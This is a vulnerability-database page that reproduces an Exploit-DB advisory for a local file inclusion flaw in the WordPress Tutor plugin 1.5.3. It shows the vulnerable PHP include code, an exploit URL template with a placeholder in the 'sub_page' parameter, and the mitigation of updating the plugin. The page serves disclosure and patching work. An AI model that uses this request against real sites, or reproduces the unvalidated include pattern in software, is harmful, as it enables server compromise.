header-logo
Suggest Exploit
vendor:
Wordpress Plugin tutor
by:
mehran feizi
8.8
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: Wordpress Plugin tutor
Affected Version From: 1.5.3
Affected Version To: 1.5.3
Patch Exists: YES
Related CWE: N/A
CPE: a:wordpress:wordpress_plugin:tutor
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2020

WordPress Plugin tutor.1.5.3 – Local File Inclusion

The vulnerability exists due to insufficient validation of user-supplied input in the 'sub_page' parameter of '/instructors.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary PHP code on the target system.

Mitigation:

Update to the latest version of the plugin.
Source

Exploit-DB raw data:

#  Tile: Wordpress Plugin tutor.1.5.3 - Local File Inclusion
#  Author: mehran feizi
#  Category: webapps
#  Date: 2020-02-12
#  vendor home page: https://wordpress.org/plugins/tutor/

===================================================================
Vulnerable page:
/instructors.php
===================================================================
Vulnerable Source:
3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET); 
5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php"; 
7: include include $include_file; 
requires:
4: if(!empty($sub_page))
6: if(file_exists($include_file))
===================================================================
Exploit:
localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI]
=================================================================================
contact me:
telegram: @MF0584
gmail: mehranfeizi13841384@gmail.com
===================================================================
Vulnerable page:
/instructors.php
===================================================================
Vulnerable Source:
3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET); 
5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php"; 
7: include include $include_file; 
requires:
4: if(!empty($sub_page))
6: if(file_exists($include_file))
===================================================================
Exploit:
localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI]
=================================================================================

Navigation

Suggest Exploit

Services By CQR